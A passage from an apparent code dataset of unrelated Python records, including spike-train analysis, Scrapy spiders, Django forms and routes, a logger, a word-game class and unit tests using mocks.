running_from_path+file_out\n\n text = open(file_in, 'r').read()\n\n soup = bs4(text, 'html.parser')\n \n \n count = count\n \n with open(file_out, 'w') as fd:\n\n for key in soup.find_all('a'):\n if '.mp3' in key.get('href'):\n counter = '{:03d}'.format(count)\n fd.write('{}.mp3|{}|{}\\n'.format(counter, ''.join(key.get('href').split()), ' '.join(key.get_text().split())))\n\n count += 1 \n'''\nif __name__ == '__main__':\n get_html_mp4('get_url.txt', 3)\n'''\n \n\n\n\n","sub_path":"future/crawler/crawler/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":12598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"286958145","text":"# -*- coding: utf-8 -*-\n# @Author: Guillaume Viejo\n# @Date: 2022-07-07 11:11:16\n# @Last Modified by: Guillaume Viejo\n# @Last Modified time: 2023-03-03 16:57:10\nimport numpy as np\nimport pandas as pd\nimport pynapple as nap\nfrom pylab import *\nfrom functions import *\nimport sys\nfrom pycircstat.descriptive import mean as circmean\nimport _pickle as cPickle\nfrom matplotlib.gridspec import GridSpec\nfrom itertools import combinations\nfrom scipy.stats import zscore\nfrom sklearn.linear_model import LogisticRegression, LogisticRegressionCV\nfrom sklearn.preprocessing import StandardScaler\nfrom xgboost import XGBClassifier\nfrom sklearn.decomposition import PCA, FastICA, KernelPCA\nfrom sklearn.manifold import Isomap\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.metrics import f1_score\n\n\n############################################################################################### \n# GENERAL infos\n###############################################################################################\n# data_directory = '/mnt/DataRAID2/'\ndata_directory = '/mnt/ceph/users/gviejo'\ndatasets = np.genfromtxt(os.path.join(data_directory,'datasets_LMN_ADN.list'), delimiter = '\\n', dtype = str, comments = '#')\n\nsta_r = {'adn':[], 'lmn':[]} # trigger average of proba from the other structure spikes\ncc_down = {'adn':[], 'lmn':[]} # cross corr of adn and lmn / adn down states\nsta_r_down = {'adn':[], 'lmn':[]} # proba trigger on down states\n\n\n\nfor s in datasets:\n print(s)\n ############################################################################################### \n # LOADING DATA\n ###############################################################################################\n path = os.path.join(data_directory, s)\n data = nap.load_session(path, 'neurosuite')\n spikes = data.spikes\n position = data.position\n wake_ep = data.epochs['wake']\n sws_ep = data.read_neuroscope_intervals('sws')\n rem_ep = data.read_neuroscope_intervals('rem')\n down_ep = data.read_neuroscope_intervals('down')\n idx = spikes._metadata[spikes._metadata[\"location\"].str.contains(\"adn|lmn\")].index.values\n spikes = spikes[idx]\n \n ############################################################################################### \n # COMPUTING TUNING CURVES\n ###############################################################################################\n tuning_curves = nap.compute_1d_tuning_curves(spikes, position['ry'], 120, minmax=(0, 2*np.pi), ep = position.time_support.loc[[0]])\n tuning_curves = smoothAngularTuningCurves(tuning_curves) \n tcurves = tuning_curves\n SI = nap.compute_1d_mutual_info(tcurves, position['ry'], position.time_support.loc[[0]], (0, 2*np.pi))\n peaks = pd.Series(index=tcurves.columns,data = 
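copy_to_remote in the stack.py record above retries rsync in an unbounded `while result != 0` loop, which spins forever on a permanent failure (bad password, missing path). A sketch of a bounded variant with backoff; max_tries and delay are hypothetical parameters, the shell-command convention is the record's own:

import subprocess
import time

def run_with_retries(cmd, max_tries=5, delay=2.0):
    # Retry a shell command a bounded number of times, backing off between tries.
    for attempt in range(1, max_tries + 1):
        result = subprocess.Popen(cmd, shell=True).wait()
        if result == 0:
            return True
        print('attempt %d failed with exit code %d' % (attempt, result))
        time.sleep(delay * attempt)
    return False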
np.array([circmean(tcurves.index.values, tcurves[i].values) for i in tcurves.columns]))\n\n spikes.set_info(SI, peaks=peaks)\n\n adn = list(spikes.getby_category(\"location\")[\"adn\"].getby_threshold(\"SI\", 0.3).index)\n lmn = list(spikes.getby_category(\"location\")[\"lmn\"].getby_threshold(\"SI\", 0.1).index)\n\n # figure()\n # for i, n in enumerate(spikes.index):\n # subplot(10,10,i+1, projection='polar') \n # if n in adn:\n # plot(tcurves[n], color = 'red')\n # elif n in lmn:\n # plot(tcurves[n], color = 'green')\n # else:\n # plot(tcurves[n], color = 'grey')\n # xticks([])\n # yticks([])\n\n # sys.exit()\n\n tokeep = adn+lmn\n tokeep = np.array(tokeep)\n spikes = spikes[tokeep] \n\n velocity = computeLinearVelocity(position[['x', 'z']], position.time_support.loc[[0]], 0.2)\n newwake_ep = velocity.threshold(0.001).time_support \n\n ############################################################################################### \n # LOGIT\n ###############################################################################################\n groups = spikes.getby_category(\"location\")\n\n if len(groups['adn'])>6 and len(groups['lmn'])>8:\n\n ## MUA ########\n mua = {\n 0:nap.Ts(t=np.sort(np.hstack([groups['adn'][j].index.values for j in groups['adn'].index]))),\n 1:nap.Ts(t=np.sort(np.hstack([groups['lmn'][j].index.values for j in groups['lmn'].index])))}\n\n mua = nap.TsGroup(mua, time_support = spikes.time_support)\n\n ## DOWN CENTER ######\n down_center = (down_ep[\"start\"] + (down_ep['end'] - down_ep['start'])/2).values\n down_center = nap.TsGroup({\n 0:nap.Ts(t=down_center, time_support = sws_ep)\n })\n\n ## SHUFFLING #####\n bin_size_wake = 0.1\n bin_size_sws = 0.01\n\n gmap = {'adn':'lmn', 'lmn':'adn'}\n\n for i, g in enumerate(gmap.keys()):\n\n # WAKE \n count = groups[g].count(bin_size_wake, newwake_ep)\n rate = count/bin_size_wake\n rate = rate.rolling(window=100,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=2)\n rate_wak = StandardScaler().fit_transform(rate)\n\n # WAKE SHUFFLE\n count = nap.randomize.shuffle_ts_intervals(groups[g]).count(bin_size_wake, newwake_ep)\n rate = count/bin_size_wake\n rate = rate.rolling(window=100,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=2)\n rate_shu = StandardScaler().fit_transform(rate)\n\n # # adding a zero vector\n # rate_shu = np.vstack((rate_shu, np.zeros((1,rate_shu.shape[1]))))\n \n # SWS\n count = groups[g].count(bin_size_sws, sws_ep)\n time_index = count.index.values\n rate = count/bin_size_sws\n rate = rate.rolling(window=100,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=1)\n rate_sws = StandardScaler().fit_transform(rate)\n\n X = np.vstack((rate_wak, rate_shu))\n y = np.hstack((np.zeros(len(rate_wak)), np.ones(len(rate_shu)))).astype(np.int32)\n Xt = rate_sws\n\n #####################\n bst = XGBClassifier(\n n_estimators=100, max_depth=20, \n learning_rate=0.0001, objective='binary:logistic', \n random_state = 0,# booster='dart',\n #eval_metric=f1_score)\n )\n bst.fit(X, y) \n # tmp = bst.predict_proba(Xt)[:,0]\n tmp = 1.0-bst.predict(Xt)\n ######################\n\n p = nap.Tsd(t = time_index, d = tmp, time_support = sws_ep)\n\n # figure()\n # subplot(121)\n # scatter(a[:, 0], a[:, 1], marker=\".\", c=y, alpha=0.4)\n # title(\"Truth\")\n # subplot(122)\n # scatter(a[:, 0], a[:, 1], marker=\".\", c=tmp, alpha=0.4)\n # title(\"Predicted\")\n\n # STA / neurons \n sta_neurons = nap.compute_event_trigger_average(groups[gmap[g]], p, bin_size_sws, (-0.4, 0.4), sws_ep)\n 
#sta_neurons = nap.compute_event_trigger_average(mua[[i]], p, bin_size_sws, (-0.4, 0.4), sws_ep) \n #sta_neurons = sta_neurons.as_dataframe().apply(zscore) \n \n # STA / down\n sta_down = nap.compute_event_trigger_average(down_center, p, bin_size_sws, (-0.4, 0.4), sws_ep)\n #sta_down = sta_down.as_dataframe().apply(zscore) \n\n # CC / down\n cc_d = nap.compute_eventcorrelogram(groups[g], down_center[0], bin_size_sws, 0.4, ep=sws_ep)\n\n ### SAVING ####\n sta_r[g].append(sta_neurons) # trigger average of reactivtion from the other structure spikes\n cc_down[g].append(cc_d) # cross corr of adn and lmn / adn down states\n sta_r_down[g].append(sta_down) # reactivation trigger on down states\n\nfor i, g in enumerate(['adn', 'lmn']):\n sta_r[g] = pd.concat(sta_r[g], 1)\n sta_r_down[g] = pd.concat(sta_r_down[g], 1)\n cc_down[g] = pd.concat(cc_down[g], 1)\n\n# sys.exit()\n\n\nfigure()\nsubplot(1,3,1)\nplot(sta_r['adn'].mean(1), label = 'adn r')\nplot(sta_r['lmn'].mean(1), label = 'lmn r')\nlegend()\nxlabel(\"Time from the other\")\ntitle(\"STA proba attractorness\")\n\nsubplot(1,3,2)\nplot(sta_r_down['adn'].mean(1), label = 'adn r')\nplot(sta_r_down['lmn'].mean(1), label = 'lmn r')\nxlabel(\"Time from ADN down center\")\ntitle(\"STA proba attractorness\")\nlegend()\n\nsubplot(1,3,3)\nplot(cc_down['adn'].mean(1), label = 'adn')\nplot(cc_down['lmn'].mean(1), label = 'lmn')\nlegend()\nxlabel(\"Time from ADN down center\")\ntitle(\"CC\")\n\n\nfigure()\nsubplot(2,2,1)\nplot(sta_r['adn'], label = 'adn r')\ntitle(\"STA proba attractorness\")\nxlabel(\"Time from LMN spikes\")\nlegend()\n\nsubplot(2,2,3)\nplot(sta_r['lmn'], label = 'lmn r')\nlegend()\nxlabel(\"Time from ADN spikes\")\n\n\nsubplot(2,2,2)\nplot(sta_r_down['adn'].mean(1), label = 'adn r')\ntitle(\"STA proba attractorness\")\n\nsubplot(2,2,4)\nplot(sta_r_down['lmn'].mean(1), label = 'lmn r')\nxlabel(\"Time from ADN down center\")\n\nshow()\n","sub_path":"pyna/main_pyna_LMN_ADN_LOGIT.py","file_name":"main_pyna_LMN_ADN_LOGIT.py","file_ext":"py","file_size_in_byte":9018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"562052598","text":"# -*- coding: utf-8 -*-\nimport pprint, re, requests, scrapy\n\nfrom forum_duanzibar_com.items import ForumDuanzibarComItem\nfrom forum_duanzibar_com.settings import API_SETTINGS\n\n\nclass CosplayTorikoComSpider(scrapy.Spider):\n\tname = \"cosplay_toriko_com\"\n\tallowed_domains = [\"cosplay-toriko.com\"]\n\tstart_urls = ['http://cosplay-toriko.com']\n\n\tcategories = []\n\tfid = 61\n\tpages = 20\n\t\n\n\tdef image_handle_redirect(self, image_url, headers={}):\n\t\tresponse = requests.head(image_url, headers=headers)\n\t\tif response.status_code in range(300, 400):\n\t\t\timage_url = response.headers[\"Location\"]\n\t\treturn image_url\n\n\n\tdef parse(self, response):\n\t\t# for page in range(self.pages - 10, self.pages + 1)[::-1]:\n\t\tfor page in range(self.pages + 1)[::-1]:\n\t\t\tif page > 0:\n\t\t\t\turl = \"{}/category/101/{}/\".format(self.start_urls[0], page)\n\t\t\t\tyield scrapy.Request(url, callback=self.parsePage)\n\n\n\tdef parsePage(self, response):\n\t\tposts = response.xpath(\"\"\"//div[@id=\"postlist\"]/div[@class=\"item_box\"]\"\"\")\n\t\tfor post in posts:\n\t\t\titem = ForumDuanzibarComItem()\n\t\t\ttitle = post.xpath(\"\"\"./div[@class=\"clearfix\"]/div/h3/a/text()\"\"\").extract_first()\n\t\t\tarticle_url = \"{}{}\".format(self.start_urls[0], 
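The pyna record above fits an XGBClassifier to separate real wake activity (label 0) from time-shuffled activity (label 1), then scores sleep bins with the same model. A self-contained toy of that train-on-0/1, score-held-out pattern, on synthetic arrays (shapes only, not the real rates):

import numpy as np
from xgboost import XGBClassifier

rng = np.random.default_rng(0)
real = rng.normal(1.0, 1.0, size=(500, 20))      # stands in for rate_wak
shuffled = rng.normal(0.0, 1.0, size=(500, 20))  # stands in for rate_shu
X = np.vstack((real, shuffled))
y = np.hstack((np.zeros(500), np.ones(500))).astype(np.int32)

clf = XGBClassifier(n_estimators=100, max_depth=20,
                    learning_rate=0.0001, objective='binary:logistic',
                    random_state=0)
clf.fit(X, y)

held_out = rng.normal(0.5, 1.0, size=(100, 20))  # stands in for rate_sws
score = 1.0 - clf.predict(held_out)              # 1 -> bin looks like real wake activity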
post.xpath(\"\"\"./div[@class=\"clearfix\"]/div/h3/a/@href\"\"\").extract_first())\n\t\t\tthumbnail_src = \"{}{}\".format(self.start_urls[0], post.xpath(\"\"\"./div[@class=\"clearfix\"]/p/a/img/@src\"\"\").extract_first())\n\t\t\titem['fid'] = self.fid\n\t\t\titem['response_url'] = response.url\n\t\t\titem['title'] = title\n\t\t\titem['categories'] = self.categories\n\t\t\titem['image_urls'] = []\n\t\t\titem['thumbnail_url'] = self.image_handle_redirect(thumbnail_src, {'Referer': article_url})\n\t\t\titem['image_urls'].append(item['thumbnail_url'])\n\t\t\titem['content_url'] = article_url\n\t\t\titem['referer'] = article_url\n\t\t\titem['contents'] = []\n\t\t\tyield scrapy.Request(item['content_url'], meta={'item': item}, callback=self.parseContent)\n\n\n\tdef parseContent(self, response):\n\t\titem = response.meta['item']\n\t\timages = response.xpath(\"\"\"//div[@id=\"post_pict_box\"]/ul/li\"\"\")\n\t\tfor img in images:\n\t\t\timage_src = self.image_handle_redirect(\"{}{}\".format(self.start_urls[0], img.xpath(\"\"\"./p[@class=\"post_img\"]/a/@href\"\"\").extract_first()))\n\t\t\tif image_src:\n\t\t\t\titem['contents'].append(image_src)\n\t\t\t\tif image_src not in item['image_urls']:\n\t\t\t\t\titem['image_urls'].append(image_src)\n\t\tyield item","sub_path":"forum_duanzibar_com/forum_duanzibar_com/spiders/cosplay_toriko_com.py","file_name":"cosplay_toriko_com.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"70731045","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\n\nfrom .models import User\n\n\nclass CustomUserCreationForm(UserCreationForm):\n class Meta(UserCreationForm.Meta):\n model = User\n fields = ('email', )\n\n\nclass CustomUserChangeForm(UserChangeForm):\n class Meta(UserChangeForm.Meta):\n model = User\n fields = ('email', )\n\n\nclass UserRegistrationForm(CustomUserCreationForm):\n first_name = forms.CharField(max_length=60)\n last_name = forms.CharField(max_length=60)\n\n class Meta(CustomUserCreationForm.Meta):\n fields = CustomUserCreationForm.Meta.fields + ('first_name', 'last_name')\n\n\nclass ProfileUpdateForm(forms.ModelForm):\n class Meta:\n model = User\n fields = ('first_name', 'last_name')\n","sub_path":"mailauth/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"357371682","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\nfrom pymongo import MongoClient\n\n\nclass Lesson8ScrapyPipeline:\n def __init__(self):\n client = MongoClient('localhost', 27017)\n self.mongo_base = client.instagram\n\n def process_item(self, item, spider):\n\n if item['being_scraped'] == item['profile_owner']:\n # получаем название коллекции по типу randomuser1_followers/following\n collection = self.mongo_base[item['being_scraped']+'_followers']\n del item['being_scraped']\n\n elif item['being_scraped'] == item['follower']:\n collection = self.mongo_base[item['being_scraped'] + '_following']\n del item['being_scraped']\n\n collection.insert_one(item)\n return 
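image_handle_redirect in the spider record above resolves a redirect by reading the Location header manually (requests.head does not follow redirects by default). requests can follow the chain itself when asked, so an equivalent helper covering the record's single-hop case is:

import requests

def resolve_redirects(url, headers=None):
    # Opting in to allow_redirects returns the final URL after the redirect chain.
    return requests.head(url, headers=headers or {}, allow_redirects=True).url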
item\n","sub_path":"lesson8_scrapy/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"97807511","text":"#coding=utf8\r\nu''' 实现记录日志功能 \r\n默认情况下,logging将日志打印到屏幕,日志级别为WARNING;\r\n日志级别大小关系为:CRITICAL > ERROR > WARNING > INFO > DEBUG > NOTSET\r\n''' \r\n\r\nimport logging,os\r\nimport config\r\nfrom logging.handlers import RotatingFileHandler\r\n\r\nBASE_DIR = config.readConfig(\"config.conf\", \"pro_dir\", \"pro_dir\")\r\n\r\nclass Log():\r\n log_name = config.readConfig(\"config.conf\", \"log\", \"log_name\")\r\n \r\n def __init__(self,file_name=log_name):\r\n self.log_dir = os.path.join(BASE_DIR,config.readConfig(\"config.conf\", \"log\", \"log_dir\"))\r\n self.log_size = int(config.readConfig(\"config.conf\", \"log\", \"log_size\")) * 1024 * 1024\r\n self.log_backup_count = int(config.readConfig(\"config.conf\", \"log\", \"log_backup_count\"))\r\n self.log_name = file_name\r\n self.log_level = config.readConfig(\"config.conf\", \"log\", \"log_level\")\r\n self.log_level = self.log_level.lower() #防止大小写不一致的问题,大写转小写\r\n \r\n if self.log_level == \"notest\":\r\n self.log_level = logging.NOTSET\r\n \r\n elif self.log_level == \"debug\":\r\n self.log_level = logging.DEBUG\r\n \r\n elif self.log_level == \"info\":\r\n self.log_level = logging.INFO\r\n \r\n elif self.log_level == \"warning\":\r\n self.log_level = logging.WARNING\r\n \r\n elif self.log_level == \"error\":\r\n self.log_level = logging.ERROR\r\n \r\n elif self.log_level == \"critical\":\r\n self.log_level = logging.CRITICAL\r\n \r\n else:\r\n self.log_level = logging.INFO\r\n \r\n '''\r\n logging.basicConfig(level=self.log_level,\r\n format='%(asctime)s %(filename)s ---> method:%(funcName)s[line:%(lineno)d] %(levelname)s %(message)s',\r\n datefmt='%Y-%m-%d %H:%M:%S',\r\n filename = os.path.join(self.log_dir,self.log_name),\r\n filemod='w')\r\n '''\r\n logger = logging.getLogger()\r\n logger.setLevel(self.log_level)\r\n handler = RotatingFileHandler(os.path.join(self.log_dir,self.log_name),\r\n maxBytes=self.log_size,\r\n backupCount=self.log_backup_count)\r\n formatter = logging.Formatter('%(asctime)s %(filename)s ---> method:%(funcName)s[line:%(lineno)d] %(levelname)s %(message)s')\r\n handler.setFormatter(formatter)\r\n logger.addHandler(handler)\r\n self.logger = logger\r\n'''\r\nif __name__ == \"__main__\":\r\n log = Log()\r\n log.info(\"this is a test info message,wa ha ha O(∩_∩)O~\")\r\n'''","sub_path":"selenium_learning/common_modules/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"33061124","text":"from common import *\nfrom authentication import *\nimport authentication\nfrom sync import sync_methods\nfrom handlers import tagHandler, syncHandler\n\n@accepted_roles(admin_roles())\ndef get():\n tags = [\n {\"name\": \"YEAR\", \"address\": \"%MW0\", \"type\": \"value\", \"controller_ip\": \"192.168.0.1\", \"installation\":\"66002174487292\"},\n {\"name\": \"MONTH\", \"address\": \"%MW1\", \"type\": \"value\", \"controller_ip\": \"192.168.0.1\", \"installation\":\"66002174487292\"},\n {\"name\": \"DAY\", \"address\": \"%MW2\", \"type\": \"value\", \"controller_ip\": \"192.168.0.1\", \"installation\":\"66002174487292\"},\n {\"name\": \"HOUR\", \"address\": \"%MW3\", \"type\": \"value\", \"controller_ip\": \"192.168.0.1\", \"installation\":\"66002174487292\"},\n {\"name\": 
\"MINUTE\", \"address\": \"%MW4\", \"type\": \"value\", \"controller_ip\": \"192.168.0.1\", \"installation\":\"66002174487292\"},\n {\"name\": \"SECOND\", \"address\": \"%MW5\", \"type\": \"value\", \"controller_ip\": \"192.168.0.1\", \"installation\":\"66002174487292\"},\n {\"name\": \"ALARM_MINUTE\", \"address\": \"%MW4:X0\", \"type\": \"alarm\", \"controller_ip\": \"192.168.0.1\", \"installation\":\"66002174487292\"},\n {\"name\": \"WARNING_SECOND\", \"address\": \"%MW5:X1\", \"type\": \"warning\", \"controller_ip\": \"192.168.0.1\", \"installation\":\"66002174487292\"}\n ]\n res = []\n for tag in tags:\n res.append(tagHandler.insert(tag))\n for i in range(0,255):\n addr_num = i % 12\n name = \"gen_tag_%s\"%(i,)\n address = \"%%MW%s\" % (addr_num,)\n type = \"value\"\n controller_ip = \"192.168.0.1\"\n installation = \"66002174487292\"\n gen_tag = {\"name\": name, \"address\": address, \"type\": type, \"controller_ip\": controller_ip, \"installation\": installation}\n res.append(tagHandler.insert(gen_tag))\n if not (False in res or None in res):\n return OkResponse(\"Successfully added the new tag\")\n else:\n return ConflictResponse(\"Could not insert the tag for that controller/installation/customer\")\n\n","sub_path":"portal/backend/api/populate_demo_data.py","file_name":"populate_demo_data.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"1353359","text":"import unittest, socket\nfrom raygun4py import raygunmsgs\n\nclass TestRaygunMessageBuilder(unittest.TestCase):\n\n def setUp(self):\n self.builder = raygunmsgs.RaygunMessageBuilder().new()\n self.request = {\n \"headers\": {\n \"referer\": \"localhost\",\n \"user-Agent\": \"Mozilla\"\n },\n \"hostName\": \"localhost\",\n \"url\": \"/resource\",\n \"httpMethod\": \"GET\",\n \"ipAddress\": \"127.0.0.1\",\n \"queryString\": None,\n \"form\": None,\n \"rawData\": None\n }\n\n def test_machinename(self):\n self.builder.set_machine_name(socket.gethostname())\n self.assertIsNotNone(self.builder.raygunMessage.details['machineName'])\n\n def test_customdata(self):\n self.builder.set_customdata({1: \"one\"})\n self.assertIsInstance(self.builder.raygunMessage.details['userCustomData'], dict)\n\n def test_tags(self):\n self.builder.set_tags([1, 2, 3])\n self.assertIsInstance(self.builder.raygunMessage.details['tags'], list)\n\n def test_request_ip(self):\n self.builder.set_request_details(self.request)\n self.assertEqual(self.builder.raygunMessage.details['request']['iPAddress'], '127.0.0.1')\n\n def test_user(self):\n self.builder.set_user('user1')\n self.assertEqual(self.builder.raygunMessage.details['user'], { 'identifier': 'user1' })\n\n\ndef main():\n unittest.main()\n\nif __name__ == '__main__':\n main()","sub_path":"tests/test_raygunmsgs.py","file_name":"test_raygunmsgs.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"307723878","text":"from persistent.mapping import PersistentMapping\nfrom zope.interface import implementer\n\nfrom substanced.content import content\nfrom substanced.folder import Folder\n\nfrom ..interfaces import (\n ITournaments,\n ITournament\n )\n\nfrom ..utils import (\n BaseContent,\n ATTENDING\n )\n\n@content(\n ITournaments,\n name='Tournament',\n icon='icon-tags',\n)\n@implementer(ITournaments)\nclass Tournaments(Folder):\n def __init__(self):\n Folder.__init__(self)\n self.title = 'Tournaments'\n\n\n@content(\n 
ITournament,\n name='Tournament',\n icon='icon-tags',\n)\n@implementer(ITournament)\nclass Tournament(BaseContent):\n props = None\n\n def __init__(self, external_id, title, position, props=None):\n BaseContent.__init__(self)\n self.external_id = external_id\n self.title = title\n self.position = position\n\n if props:\n self.props = PersistentMapping()\n for k, v in props.items():\n self.props[k] = v\n\n def players(self):\n \"\"\" Sorted list of players attending tournament \"\"\"\n players = list(self.get_sources(ATTENDING))\n return sorted(players, key=lambda p: p.title)\n\n\n","sub_path":"src/fastbreak/fastbreak/tournament/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"300205753","text":"import random\n\n\nclass Hand(object):\n def __init__(self, n):\n '''\n Initialize a Hand.\n\n n: integer, the size of the hand.\n '''\n assert type(n) == int\n self.HAND_SIZE = n\n self.VOWELS = 'aeiou'\n self.CONSONANTS = 'bcdfghjklmnpqrstvwxyz'\n\n # Deal a new hand\n self.dealNewHand()\n\n def dealNewHand(self):\n '''\n Deals a new hand, and sets the hand attribute to the new hand.\n '''\n # Set self.hand to a new, empty dictionary\n self.hand = {}\n\n # Build the hand\n numVowels = self.HAND_SIZE // 3\n\n for i in range(numVowels):\n x = self.VOWELS[random.randrange(0, len(self.VOWELS))]\n self.hand[x] = self.hand.get(x, 0) + 1\n\n for i in range(numVowels, self.HAND_SIZE):\n x = self.CONSONANTS[random.randrange(0, len(self.CONSONANTS))]\n self.hand[x] = self.hand.get(x, 0) + 1\n\n def setDummyHand(self, handString):\n '''\n Allows you to set a dummy hand. Useful for testing your implementation.\n\n handString: A string of letters you wish to be in the hand. Length of\n this string must be equal to self.HAND_SIZE.\n\n This method sets the hand attribute to a dictionary\n containing the letters of handString.\n '''\n assert len(handString) == self.HAND_SIZE, \\\n \"Length of handString ({0}) must equal length of \\\n HAND_SIZE ({1})\".format(len(handString), self.HAND_SIZE)\n self.hand = {}\n for char in handString:\n self.hand[char] = self.hand.get(char, 0) + 1\n\n def calculateLen(self):\n '''\n Calculate the length of the hand.\n '''\n ans = 0\n for k in self.hand:\n ans += self.hand[k]\n return ans\n\n def __str__(self):\n '''\n Display a string representation of the hand.\n '''\n output = ''\n hand_keys = sorted(self.hand.keys())\n for letter in hand_keys:\n for j in range(self.hand[letter]):\n output += letter\n return output\n\n def update(self, word):\n \"\"\"\n Does not assume that self.hand has all the letters in word.\n\n Updates the hand: if self.hand does have all the letters to make\n the word, modifies self.hand by using up the letters in the given word.\n\n Returns True if the word was able to be made with the letters in\n the hand; False otherwise.\n\n word: string\n returns: Boolean (if the word was or was not made)\n \"\"\"\n # Your code here\n # Pseudocode\n # 0. Get letter frequency of the word\n word_freq = {}\n for letter in word:\n word_freq[letter] = word_freq.get(letter, 0) + 1\n # 1. Check self.hand has all the letters to make the word\n invalid_letters = {key: value for key, value in word_freq.items()\n if key not in [*self.hand] or\n value > self.hand.get(key, 0)}\n # 2. 
If yes, modify self.hand, then return True\n if not len(invalid_letters):\n self.hand = {key: (value - word_freq.get(key, 0))\n for key, value in self.hand.items()}\n return True\n # 3. If no, return False\n else:\n return False\n\n\nmyHand = Hand(14)\nprint(myHand)\nprint(myHand.calculateLen())\n\nmyHand.setDummyHand('cccllaapppttrr')\nprint(myHand)\nprint(myHand.calculateLen())\n\nmyHand.update('zaclaptrap')\nprint(myHand)\n","sub_path":"mit6001/week5/hand.py","file_name":"hand.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"258899853","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('tracks/', views.tracks, name='tracks-all'),\n path('tracks/top', views.tracks_top, name='tracks-top'),\n path('tracks/', views.track, name='track-single'),\n\n path('albums/', views.albums, name='albums-all'),\n path('albums/', views.album, name='album-single'),\n\n path('purchases//send', views.send_songs, name='send_songs'),\n\n path('customers/new', views.customer_new, name='customer-new'),\n path('customers//purchases', views.customer_email_purchases, name=\"customer-email-purchases\"),\n path('customers//purchases/new', views.customer_purchase_new, name=\"customer-purchase-new\")\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"516565619","text":"import wx\nfrom patternpad import ID_QUIT\nfrom patternpad.MenuBar import MenuBar\n\nclass Frame(wx.Frame):\n\tdef __init__(self, *args, **kwargs):\n\t\twx.Frame.__init__(self, title='PatternPad', *args, **kwargs)\n\n\t\tself.Bind(wx.EVT_CLOSE, self.OnClose)\n\t\tself.Bind(wx.EVT_MENU, self.OnClose, id=ID_QUIT)\n\t\t\n\t\tself.SetMenuBar(MenuBar())\n\t\tself.Show()\n\n\tdef OnClose(self, event):\n\t\t#check isSaved and prompt if not\n\t\tself.Destroy()\n","sub_path":"patternpad/Frame.py","file_name":"Frame.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"193011771","text":"import unittest\r\nfrom unittest.mock import MagicMock\r\nfrom unittest import mock\r\n\r\nimport salary\r\n\r\nclass TestSalary(unittest.TestCase):\r\n def test_calculation_salary(self):\r\n s = salary.Salary(year=2017)\r\n s.bonus_api.bonus_price = MagicMock(return_value=1)\r\n self.assertEqual(s.calculation_salary(), 101)\r\n s.bonus_api.bonus_price.assert_called_once()\r\n s.bonus_api.bonus_price.assert_called_with(year=2017)\r\n\r\n def test_calculation_salary_no_salary(self):\r\n s = salary.Salary(year=2050)\r\n s.bonus_api.bonus_price = MagicMock(return_value=0)\r\n self.assertEqual(s.calculation_salary(), 100)\r\n s.bonus_api.bonus_price.assert_not_called()\r\n\r\n @mock.patch('salary.ThirdPartyBonusRestApi.bonus_price',\r\n return_value=1)\r\n def test_calculation_salary_no_salary_patch(self, mock_bonus):\r\n s = salary.Salary(year=2017)\r\n self.assertEqual(s.calculation_salary(), 101)\r\n mock_bonus.assert_called()\r\n\r\n def test_calculation_salary_no_salary_patch_with(self):\r\n with mock.patch(\r\n 'salary.ThirdPartyBonusRestApi.bonus_price') as mock_bonus:\r\n mock_bonus.return_value = 1\r\n\r\n s = salary.Salary(year=2017)\r\n salary_price = s.calculation_salary()\r\n\r\n self.assertEqual(salary_price, 101)\r\n mock_bonus.assert_called()\r\n\r\n def setUp(self):\r\n self.patcher = 
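With the `self.hand.get(key, 0)` fix in the record above, Hand.update can also be phrased with collections.Counter, whose subtraction performs the availability check and the decrement in one step. A standalone sketch over plain dicts (update_hand is a hypothetical name, not the record's API):

from collections import Counter

def update_hand(hand, word):
    # Returns (ok, new_hand); ok is False when the hand lacks letters for word.
    need = Counter(word)
    have = Counter(hand)
    if need - have:                # non-empty leftover means some letter is missing
        return False, dict(hand)
    # Counter subtraction drops fully-used letters instead of keeping them at 0.
    return True, dict(have - need)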
